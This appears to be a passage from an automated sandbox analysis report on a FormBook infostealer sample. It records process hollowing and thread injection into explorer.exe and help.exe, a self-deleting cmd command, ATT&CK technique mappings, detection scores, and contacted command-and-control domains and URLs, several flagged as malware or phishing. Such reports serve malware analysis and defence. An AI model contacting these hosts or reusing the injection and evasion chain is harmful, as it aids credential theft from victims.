          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFEA55 mov eax, dword ptr fs:[00000030h]11_2_00BFEA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BC4257 mov eax, dword ptr fs:[00000030h]11_2_00BC4257
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]11_2_00B39240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]11_2_00B39240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]11_2_00B39240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B39240 mov eax, dword ptr fs:[00000030h]11_2_00B39240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B47E41 mov eax, dword ptr fs:[00000030h]11_2_00B47E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]11_2_00BFAE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFAE44 mov eax, dword ptr fs:[00000030h]11_2_00BFAE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]11_2_00B64BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]11_2_00B64BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B64BAD mov eax, dword ptr fs:[00000030h]11_2_00B64BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B48794 mov eax, dword ptr fs:[00000030h]11_2_00B48794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B62397 mov eax, dword ptr fs:[00000030h]11_2_00B62397
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6B390 mov eax, dword ptr fs:[00000030h]11_2_00B6B390
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]11_2_00BB7794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]11_2_00BB7794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB7794 mov eax, dword ptr fs:[00000030h]11_2_00BB7794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF138A mov eax, dword ptr fs:[00000030h]11_2_00BF138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]11_2_00B41B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B41B8F mov eax, dword ptr fs:[00000030h]11_2_00B41B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BED380 mov ecx, dword ptr fs:[00000030h]11_2_00BED380
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B737F5 mov eax, dword ptr fs:[00000030h]11_2_00B737F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B603E2 mov eax, dword ptr fs:[00000030h]11_2_00B603E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5DBE9 mov eax, dword ptr fs:[00000030h]11_2_00B5DBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C05BA5 mov eax, dword ptr fs:[00000030h]11_2_00C05BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]11_2_00BB53CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BB53CA mov eax, dword ptr fs:[00000030h]11_2_00BB53CA
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.middreampostal.com
          Source: C:\Windows\explorer.exeDomain query: www.purpleqube.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.95.146 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bancambios.network
          Source: C:\Windows\explorer.exeDomain query: www.xn---yado-8e4dze0c.site
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.175.83.64 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.224.138.83 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thechandeck.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.215.150.183 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bluebeltpanobuy.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Users\user\Desktop\5t2CmTUhKc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 13B0000Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe' Jump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.344210993.0000000000EE0000.00000002.00000001.sdmp, help.exe, 0000000B.00000002.599509130.00000000052B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433074 Sample: 5t2CmTUhKc.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 29 www.t4mall.com 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 10 5t2CmTUhKc.exe 20 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 53 Detected unpacking (changes PE section rights) 10->53 55 Maps a DLL or memory area into another process 10->55 57 Tries to detect virtualization through RDTSC time measurements 10->57 14 5t2CmTUhKc.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 17 help.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 purpleqube.com 119.81.95.146, 49751, 80 SOFTLAYERUS Singapore 20->31 33 www.xn---yado-8e4dze0c.site 150.95.255.38, 49753, 80 INTERQGMOInternetIncJP Japan 20->33 35 9 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5t2CmTUhKc.exe29%VirustotalBrowse
          5t2CmTUhKc.exe28%ReversingLabs
          5t2CmTUhKc.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.5t2CmTUhKc.exe.2290000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.5t2CmTUhKc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.help.exe.4ed3f8.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          11.2.help.exe.35c7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.5t2CmTUhKc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd100%Avira URL Cloudphishing
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.oceancollaborative.com/bp3i/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz100%Avira URL Cloudphishing
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw==0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.t4mall.com
          		165.3.53.250
          		truefalse
            		unknown
            bancambios.network
            		185.224.138.83
            		truetrue
              		unknown
              purpleqube.com
              		119.81.95.146
              		truetrue
                		unknown
                www.xn---yado-8e4dze0c.site
                		150.95.255.38
                		truetrue
                  		unknown
                  www.thechandeck.com
                  		154.215.150.183
                  		truetrue
                    		unknown
                    middreampostal.com
                    		184.175.83.64
                    		truetrue
                      		unknown
                      oceancollaborative.com
                      		184.168.131.241
                      		truetrue
                        		unknown
                        www.middreampostal.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.purpleqube.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.oceancollaborative.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.bancambios.network
                              		unknown
                              		unknowntrue
                                		unknown
                                www.bluebeltpanobuy.com
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  www.oceancollaborative.com/bp3i/true
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw==true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csshelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorError5t2CmTUhKc.exefalse
                                                    		high
                                                    http://www.goodfont.co.krexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&uthelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comlexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vzhelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.typography.netDexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://fontfabrik.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_Error5t2CmTUhKc.exefalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
